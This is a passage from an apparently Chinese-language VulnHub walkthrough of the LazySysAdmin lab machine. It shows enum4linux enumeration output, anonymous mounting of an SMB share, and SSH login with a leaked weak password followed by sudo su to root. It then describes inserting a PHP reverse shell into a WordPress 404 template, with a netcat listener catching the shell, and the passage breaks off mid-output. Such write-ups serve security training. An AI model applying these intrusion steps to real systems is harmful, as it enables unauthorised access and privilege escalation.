role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Share Enumeration on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>Sharename       Type      Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-attribute">---------</span>       <span class="cm-attribute">----</span>      <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>print<span class="cm-def">$ </span>         Disk      Printer Drivers</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>share<span class="cm-def">$ </span>         Disk      Sumshare</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>IPC<span class="cm-def">$ </span>           IPC       IPC Service (Web server)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Reconnecting with SMB1 <span class="cm-keyword">for</span> workgroup listing.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>Server               Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>Workgroup            Master</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>WORKGROUP            </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attempting to map shares on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/print<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">  </span>Mapping</span>: DENIED, Listing: N/A</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/share<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="    ">  </span>Mapping</span>: OK, Listing: OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/IPC<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">    </span></span>[E] Can<span class="cm-string">'t understand response:</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Password Policy Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attaching to <span class="cm-number">192</span>.168.0.100 using a NULL share</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Trying protocol <span class="cm-number">445</span>/SMB...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Found domain(s):</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Builtin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Password Info <span class="cm-keyword">for</span> Domain: LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Minimum password length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password history length: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Maximum password age: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password Complexity Flags: <span class="cm-number">000000</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Refuse Password Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Store Cleartext: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Lockout Admins: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Clear Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Anon Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Complex: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Minimum password age: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Reset Account Lockout Counter: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Locked Account Duration: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Account Lockout Threshold: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Forced Log off Time: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Retieved partial password policy with rpcclient:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password Complexity: Disabled</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Minimum Password Length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Groups on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100 via RID cycling (RIDS: <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050)    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-22-1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-32</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-32 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-544 BUILTIN\Administrators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-545 BUILTIN\Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-546 BUILTIN\Guests (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-547 BUILTIN\Power Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-548 BUILTIN\Account Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-549 BUILTIN\Server Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-550 BUILTIN\Print Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1000 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1001 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-22-1 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-22-1-1000 Unix User\togie (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting printer info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No printers returned.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">enum4linux complete on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:33 <span class="cm-number">2018</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 4142px;"></div><div class="CodeMirror-gutters" style="display: none; height: 4172px;"></div></div></div></pre><p>windows下獲取共享資源</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">net use k: \\<span class="cm-number">192</span>.168.0.100\share<span class="cm-def">$</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>linux下獲取共享資源</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">mount <span class="cm-attribute">-t</span> cifs <span class="cm-attribute">-o</span> <span class="cm-def">username</span><span class="cm-operator">=</span><span class="cm-string">''</span><span class="cm-def">,password</span><span class="cm-operator">=</span><span class="cm-string">''</span> //192.168.0.100/share<span class="cm-def">$ </span>/mnt</span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/2.png' alt='2' referrerPolicy='no-referrer' /></p><p>發現兩個關鍵的文件deets.txt和wp-config.php</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/3.png' alt='3' referrerPolicy='no-referrer' /></p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/4.png' alt='4' referrerPolicy='no-referrer' /></p><p>嘗試用上面獲取的mysql賬號密碼去登錄phpmyadmin,但是發現沒一個表項可以查看。</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/5.png' alt='5' referrerPolicy='no-referrer' /></p><p>另外,上面還有一個密碼是12345,而且之前登錄WordPress頁面的時候,頁面顯示<code>My name is togie.</code>,所以可以用賬號:<code>togie</code> 密碼:<code>12345</code>嘗試登錄ssh,發現可以成功登錄。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ whoami</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[sudo] password <span class="cm-keyword">for</span> togie: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@LazySysAdmin:/home/togie<span class="cm-comment"># id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><p>有了root權限,就有權限查看目標文件/root/proof.txt,這樣就算完成了整個游戲了。這里剛好togie有root權限,所以嘗試直接用sudo su切換到root權限,但是如果togie沒有root權限,就需要通過其他方式來提權了。</p><h3><a name='header-n8459' class='md-header-anchor '></a>思路二</h3><p>通過賬號:<code>Admin</code> 密碼:<code>TogieMYSQL12345^^</code>登錄WordPress控制面板,向404.php頁面模板插入PHP反彈shell的代碼。</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/7.png' alt='7' referrerPolicy='no-referrer' /></p><p>編輯好后,點擊下面的upload file應用,然后訪問<a href='http://192.168.0.100/wordpress/?p=2' target='_blank' class='url'>http://192.168.0.100/wordpress/?p=2</a></p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~<span class="cm-comment"># nc -vlp 1234</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">listening on [any] <span class="cm-number">1234</span> ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">192</span>.168.0.100: inverse host lookup failed: Unknown host</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] <span class="cm-number">36468</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Linux LazySysAdmin <span class="cm-number">4</span>.4.0-31-generic <span class="cm-comment">#50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">16</span>:03:42 up <span class="cm-number">6</span> min,  <span class="cm-number">0</span> users,  load average: <span class="cm-number">0</span>.01, <span class="cm-number">0</span>.15, <span class="cm-number">0</span>.11</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span 